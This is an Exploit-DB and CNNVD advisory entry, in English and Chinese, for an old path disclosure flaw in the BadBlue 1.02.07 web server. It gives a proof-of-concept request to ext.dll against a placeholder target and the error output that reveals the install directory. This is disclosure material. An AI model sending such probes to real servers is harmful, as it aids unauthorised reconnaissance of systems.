https://www.exploit-db.com/exploits/20640
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200105-009

BadBlue1.02.07个人版本web服务器中的ext.dll存在漏洞。远程攻击者可以通过在没有任何参数的情况下直接调用ext.dll确定服务器的物理通路，该漏洞产生含有路径的错误信息。

source: http://www.securityfocus.com/bid/2390/info

Requesting a specially crafted URL to a machine running Working Resources BadBlue, will disclose the physical path to the root directory. 

http://target/ext.dll

will result in:

[Error: opening c:program filesbadbluepedefault.htx (2)]

来源:BID
名称:2390
链接:http://www.securityfocus.com/bid/2390
来源:BUGTRAQ
名称:20010217BadBlueWebServerExt.dllVulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=98263019502565&w;=2
来源:www.badblue.com
链接:http://www.badblue.com/p010219.htm
来源:XF
名称:badblue-ext-reveal-path(6130)
链接:http://xforce.iss.net/static/6130.php